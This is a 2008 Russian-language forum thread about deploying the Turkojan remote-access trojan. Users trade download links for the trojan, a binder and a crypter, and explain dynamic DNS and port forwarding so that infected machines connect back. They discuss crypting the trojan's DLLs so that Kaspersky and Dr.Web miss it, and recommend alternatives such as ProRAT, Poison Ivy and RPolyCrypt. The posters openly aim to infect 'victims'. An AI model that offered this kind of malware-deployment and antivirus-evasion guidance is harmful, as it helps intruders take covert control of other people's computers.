_http://rapidshare.com/files/112937556/turok.rar.html
Короткое видео по созданию ксинча , который вырубает Касперского 7.
Там без криптовки .
я уже замыслил что то страшное)) хе хе хе)))
качаем!!!
а что сделать с недокаченными плагинами???
Olegros911
06.05.2008, 17:27
Кароче турок гальмо потому што не пашет на динамических айпи.Юзайе Prorat менше проблем меньше глюков.
я на прорат не нашол видео))) а так настроить несмог.
Или руки такие , что не получается настроить днс ?
я Дсн тож настроить не смог.. англиский не для меня..
Кароче турок гальмо потому што не пашет на динамических айпи.Юзайе Prorat менше проблем меньше глюков.
DimOnOID
06.05.2008, 18:18
динамо..юзаю ноип..всё срост...=\
Olegros911
06.05.2008, 23:31
a разве можно динамику под днс настроить (разве проксьой но она $ стоит).Еще слышал о NO ip но еще не пробывал,есле можно то обясните разницу.А то трои на динамике не йдут (у меня инет через роутер)
Для чего все это и создано. Чтобы можно было с динамикой работать. На роутере надо открыть дофига портов.
Выкладываю настройки роутеров и настройки для динамических айпи.
_http://www.turkojan.com/video/noipenglish.htm - No-IP VIDEO
If you don't have static ip address,you will loose your servers when you reboot your modem or computer.You need to have DynDns or No-Ip address to prevent this.You can learn how to get an account from No-Ip from this video.
(Ekleyen : zibabina)
_http://www.turkojan.com/video/dyneng.htm - DynDNS VIDEO
If you don't have static ip address,you will loose your servers when you reboot your modem or computer.You need to have DynDns or No-Ip address to prevent this.You can learn how to get an account from DynDns from this video.
(Ekleyen : zibabina)
You need to forward port 15963(TCP) from your router.You can learn how to forward them from this site.
(Ekleyen : portforward.com)
_http://www.portforward.com/english/routers/port_forwarding/routerindex.htm - Порты на роутере
(c) www.turkojan.com
Все это есть на официальном сайте турка. Надо просто смотреть.
люди а русификация на турка есть в природе вобще?не навижу английский!!!помогите кто чем может:)
люди а русификация на турка есть в природе вобще?не навижу английский!!!помогите кто чем может:)
Я пока что не видел.
Не пойму , чем вам англ. яз не угодил ?
Там такие слова , которые знает даже школьник малой.
Там раньше в этой теме писали , что с руссификацией проблемы возникают. Кодировка слетает.
зарегался и начал юзать DynDNS
как теперь сделать так, чтобы у меня было постоянный ай пи?
Olegros911
10.05.2008, 01:26
Купить его.
а сколько примерно $.И вобще создайте тему отдельно о днс и ип адресах ато больно много непоняток
Реальный или статический айпи адресс покупается у провайдера. У каждого провайдера свои цены. Я плачу 15 грн в месяц за это.
Я пока что не видел.
Там раньше в этой теме писали , что с руссификацией проблемы возникают. Кодировка слетает.
Часть Турка можно перевести без потери кодировки использовав лишь блокнот... Слова типа: размер, имя файла можно смело переводить, на кодировку не влияет... Проверял норм. работает.
Я пока что не видел.
Часть Турка можно перевести без потери кодировки использовав лишь блокнот...
Pernat1y
14.05.2008, 15:29
угу, часть.
лучше юзать чисто английский, чем полу-русский
Olegros911
18.05.2008, 15:13
вопрос то в другом как его заделать чтоб 2 длл не палились 1 одну еще можно а вот две.......
люди а подскажите есть ли русификатор на турка????задолбал этот англиский!!!мозги плавятся!!!помогите плиз!!!!!
Pernat1y
19.05.2008, 14:14
люди а подскажите есть ли русификатор на турка????задолбал этот англиский!!!мозги плавятся!!!помогите плиз!!!!!
ппц. сложно прочитать предыдущую страницу, или хотя-бы эту?
нету русского турка
прикольно на xcontrol похож
Люди такой трабл с прогой тестил на 2х компах одно и тоже везде вобщем. Ошибка Error occured while saveing some setting. На этапе сохранения самого троя делал все по видио инструкции с этой темы... Такая вот лажа.... Винда Сп3 home edition фаеры и антивиры самом собой выкл.
проблемма вот в чём!
человек скачивает троян. Запускает его.
- не может поменять нормально язык интерфейса
- ему выбивает ошибку что версия паблик и он её не может юзать.
я скачивал Туркуян ещё тогда когда вышла 4_я версия и могу нормально юзать.
Почему другие не могут пользоваться? Может им нужен какой то кряк?
проблемма вот в чём!
человек скачивает троян. Запускает его.
- не может поменять нормально язык интерфейса
- ему выбивает ошибку что версия паблик и он её не может юзать.
я скачивал Туркуян ещё тогда когда вышла 4_я версия и могу нормально юзать.
Почему другие не могут пользоваться? Может им нужен какой то кряк?
Вроде как вышла новая версия, и они заменили старую, или просто им надоело что все юзают нормальную версию... У меня аналогичнаяситуация.
А вобще юзай поизон
Все сделал, заработало через DNS сервер, но все не раздуплю - одна из .dll осталась палевной!
Трабл в том что палевная длл ни в какую не хочет криптоватся...
Думаю что только приватным криптером это возможно или я не прав?
Olegros911
27.05.2008, 21:56
Дак я понял что они нарошно зделали чтоб длл не криптовалась.Чтоб люди покупали а не качали
100 долларов в месях
имхо. лучше прорат юзать
да и с одной ддлКой нормально впаривается.
Ну так это если паблик крипторы юзать, а приват сделает это чудо?
SUBJECT617
04.06.2008, 00:32
Вот незадача... У меня в турке язык полностью не меняется. В главгом меню он всегда туркский =( Как лечить? Заранее сенк =)
Вот незадача... У меня в турке язык полностью не меняется. В главгом меню он всегда туркский =( Как лечить? Заранее сенк =)
У всех такой трабл. Они обновили версию на сервере, теперь она еще более урезана, раньше нормальную скачать можно было. Теперь можно попробовать найти в какихнить архивах
SUBJECT617
04.06.2008, 00:41
Вот сволочи... но по ходу мне и так не пришлось бы его поюзать на полную. Если у меня нет внешнего ай-пи, то я не могу юзать никакие бекдоры? Давно еще мучался с другими бекдорами... никак не конектилось. Я обречен на покупку внешнего айпишника или же есть какоето лекарство? Я просто не очень шарю в различии внешнего и внутреннего айпи... Знаю только что торрент юзается изза этого не на полную =( Опятьже спс
no-ip.com тебе в помощ. Об этом в сервисе дох.я статей
no-ip.com тебе в помощ. Об этом в сервисе дох.я статей
Неполучаетса всё равно настроить... Мож видео ктота предоставит с настройкой?)
И видео сдесь тоже есть!
Я выкладывал прада не для турка, а для позиона, но метод работы одинаковый
SUBJECT617
04.06.2008, 11:45
Такс... No-ip настроил... Действительно легко, пусть сначала не оч. понятно. Но теперь мне надо найти нормального турка.ьНи у кого не завалялся exe'шник?
Неа. С PoisonIvy конект не проходит. Придется купить реал айпи...
Вот собрал в кучу (Турок, Видео, Клей, Криптор, ResHack)
http://www.filehoster.ru/files/z8591
SUBJECT617
05.06.2008, 17:06
Клей и крипт стоит думаю покупать... Поднакопить чуток и купить. А джой я себе купил давнооо (год назад) Наверняка палится всеми антивирями.
ЗЫ Daro У тебя норм версия турка в твоем "паке"?
Да, проверял, правда только в локалке пашет на все 100.
[x]Dar0n
06.06.2008, 17:18
У меня тож вообщем динам ип, сделал днс, ладно это все норм! Пытался криптовать трой, pohernah106 все как в видео....один фиг палит каспер, др.вэб!
ну вторая ддлка будет палиться всёравно.
они походу и сделали бета версию так, чтобы палилась вторая ддлка.. чтобы покупали
[x]Dar0n
06.06.2008, 18:22
Сделал все как надо, кинул трой, запустил на удаленной машине и .......нет конекта ппц.......в чем может быть трабла?
Что за фигня? Меняю язык на Английский, а он все-ровно не меняется(( А на этом Албанцком вообще нереально((
Что за фигня? Меняю язык на Английский, а он все-ровно не меняется(( А на этом Албанцком вообще нереально((
щас появились такие баги в бета версии... законектится нельзя. язык не меняется. Те кто успел скачать раньше, пользуется нормально.. а щас при скачке что то они изменили и теперь версия с ошибками. Я скачал пару месяцев назад с оффсайта и всё работает нормально
ну ждём новую версию турка. Может всё измениться.
А может кто-нибудь залить у кого все норально?
Kulspruta
07.06.2008, 17:29
Кто то выкладывал руссификатор, просьба перезалить turkojan+rus на slil.ru с мну +
OverflOw
07.06.2008, 19:14
у меня есть 4,0 turktrojan gold edition bug fixed. c языком проблем нету, кому надо пишите в личку, за + залью на удобный вам файл хостинг.
Olegros911
08.06.2008, 01:55
Блин там английский на минимуму нафига русификатор.Лутшеб об криптовке нормальной позаботились
когда же уже выйдет новая версия)))
OverflOw
08.06.2008, 03:51
Olegros911 согласен полностью.
*eXe* а четвертая разве давно вышла?
ну мне кажется что пол года уже есть.. хотя я не слежу за этим!
Кто то выкладывал руссификатор, просьба перезалить turkojan+rus на slil.ru с мну +
Держи русификатор:
http://slil.ru/25876595
p.s. А сомого турка можешь с оф. сайта скачать...
Блин там английский на минимуму нафига русификатор.Лутшеб об криптовке нормальной позаботились
Тоже верно, хотя русификатор помогает быстрее разобратся новичкам, да и родной язык как то ближе и приятнее))
Кстати неплохо бы услышать кто чем предпочитает криптовать...
Я, например, предпочитаю криптовать не менее двумя крипторами:
1. RPolyCrypt
2. каким-нить свежим криптором
Noctambulaar
08.06.2008, 11:59
Турки не умеют писать трояны без скрытия формы сервера, я не удивлюсь, что написан Turkojan на дельфи влс + клиентсокет компонент. У кого есть время отреверсить, посмотрите.
OverflOw
08.06.2008, 12:09
p.s. А сомого турка можешь с оф. сайта скачать...
читай что было страницу-две назад про клиент скаченный с оффсайта. К слову я тоже столкнулся с пролемой языков. пытался даже языковые файлы переименовывать :)
----
щас появились такие баги в бета версии... законектится нельзя. язык не меняется. Те кто успел скачать раньше, пользуется нормально.. а щас при скачке что то они изменили и теперь версия с ошибками. Я скачал пару месяцев назад с оффсайта и всё работает нормально
ну ждём новую версию турка. Может всё измениться.
А может кто-нибудь залить у кого все норально?
у меня есть 4,0 turktrojan gold edition bug fixed. c языком проблем нету, кому надо пишите в личку, за + залью на удобный вам файл хостинг.
тут уже спрашивали, но я до конца не понял, если у менянету внешнего ip, то я не смогу работать с турком?
Pernat1y
08.06.2008, 12:51
тут уже спрашивали, но я до конца не понял, если у менянету внешнего ip, то я не смогу работать с турком?
нет.
можеш брать крысы с прямым коннектом (типа BO2K, sub7), но если жертва за роутером...
а туркоян в сети будет работать? а то что-то не получается....не находит, хотя сделал все как надо
GoldLIke
08.06.2008, 18:51
Как узнать есть ли у меня внешний Ip?
тож тему можно закрыть на лето ? xD
а не проще подключиться к сервису No-ip и юзать турк. Во-первых хоть такая то анонимность. Во-вторых ненужно замарачиваться какой у тебя ай пи.
а не проще подключиться к сервису No-ip и юзать турк. Во-первых хоть такая то анонимность. Во-вторых ненужно замарачиваться какой у тебя ай пи.
с серым ипом я думаю не прокатит..или нет?
а туркоян в сети будет работать? а то что-то не получается....не находит, хотя сделал все как надо
будет, указывай свой внутрений айпи
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot